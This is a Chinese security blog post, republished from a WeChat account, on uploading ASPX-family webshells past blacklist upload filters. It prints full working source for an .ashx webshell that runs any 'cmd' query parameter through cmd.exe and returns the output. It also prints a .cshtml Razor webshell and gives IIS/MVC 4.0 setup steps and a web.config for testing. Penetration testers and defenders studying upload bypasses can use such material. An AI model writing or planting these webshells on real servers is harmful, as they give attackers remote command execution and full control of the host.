ASPX之黑名单上传限制的绕过

<% @ webhandler language="C#" class="AverageHandler" %>using System;using System.Web;using System.Diagnostics;using System.IO;
public class AverageHandler : IHttpHandler{  /* .Net requires this to be implemented */  public bool IsReusable  {    get { return true; }  }
  /* main executing code */  public void ProcessRequest(HttpContext ctx)  {    Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" +   HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl);    string command = HttpUtility.ParseQueryString(url.Query).Get("cmd");
    ctx.Response.Write("<form method='GET'>Command: <input name='cmd' value='"+command+"'><input type='submit' value='Run'></form>");    ctx.Response.Write("<hr>");    ctx.Response.Write("<pre>");
    /* command execution and output retrieval */    ProcessStartInfo psi = new ProcessStartInfo();    psi.FileName = "cmd.exe";    psi.Arguments = "/c "+command;    psi.RedirectStandardOutput = true;    psi.UseShellExecute = false;    Process p = Process.Start(psi);    StreamReader stmrdr = p.StandardOutput;    string s = stmrdr.ReadToEnd();    stmrdr.Close();
    ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));    ctx.Response.Write("</pre>");    ctx.Response.Write("<hr>");    ctx.Response.Write("By <a href='http://www.twitter.com/Hypn'>@Hypn</a>, for educational purposes only."); }}

Ashx Webshell执行命令

0x03 Cshtml Webshell

@using System.CodeDom.Compiler;@using System.Diagnostics;@using System.Reflection;@using System.Web.Compilation;
@functions {  string ExecuteCommand(string command, string arguments = null)  {    var output = new System.Text.StringBuilder();    var process = new Process();    var startInfo = new ProcessStartInfo    {      FileName = command,      Arguments = arguments,      WorkingDirectory = HttpRuntime.AppDomainAppPath,      RedirectStandardOutput = true,      RedirectStandardError = true,      UseShellExecute = false    };
    process.StartInfo = startInfo;    process.OutputDataReceived += (sender, args) => output.AppendLine(args.Data);    process.ErrorDataReceived += (sender, args) => output.AppendLine(args.Data);    process.Start();    process.BeginOutputReadLine();    process.BeginErrorReadLine();    process.WaitForExit();
    return output.ToString();  }}
@{  var cmd = ExecuteCommand("cmd.exe", "/c whoami");}
Output of the injected command (by Niemand):  @cmd

Cshtml Webshell执行命令

0x04 MVC4.0环境部署

本地测试环境为Windows2012 IIS8.5，默认已安装有.Net FrameWork 4.0，自己下载并安装ASP.NET MVC 4.0，将IIS中的“ISAPI和CGI限制”选项的“ASP.NET v4.0.0.30319”设置为允许，然后在网站根目录下创建一个web.config配置文件即可，内容如下：

<configuration>    <system.web>        <customErrors mode="Off"/>    </system.web>    <appSettings>             <add key="webPages:Version" value="2.0"/>    </appSettings></configuration>

.Net FrameWork 4.0下载地址：

https://www.microsoft.com/zh-CN/download/details.aspx?id=17851

ASP.NET MVC 4.0下载地址：

https://www.microsoft.com/zh-CN/download/details.aspx?id=30683

注：如果当前网站根目下没有web.config配置文件，或者没有指定.NET版本，在浏览器访问时可能就会出现以下报错信息。

没有web.config文件报错

没有指定.NET版本报错

只需在公众号回复“9527”即可领取一套HTB靶场学习文档和视频，“1120”领取安全参考等安全杂志PDF电子版，“1208”领取一份常用高效爆破字典，还在等什么？

本文始发于微信公众号（潇湘信安）：ASPX之黑名单上传限制的绕过

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

ASPX之黑名单上传限制的绕过

Web3 安全入门避坑指南｜剪贴板安全

利用n8n结合ollama-Deepseek大模型创建智能体

如何利用图像验证技术识别钓鱼攻击？

Webshell免杀思路-PHP篇-1：经典混淆的艺术

CimFS：内存崩溃，查找系统（内核版）

Astral-PE 是用于本机 Windows PE 文件（x32/x64）的低级变异器（Headers/EP 混淆器）

【通俗易懂说AI】MCP如何安装以及使用

深入解析 URL 跳转漏洞：审计方法与渗透实战全攻略

记一次前端js加解密泄露引发的漏洞

一文吃透文件上传漏洞！路径遍历、后缀绕过、ZIP炸弹全解析

发表评论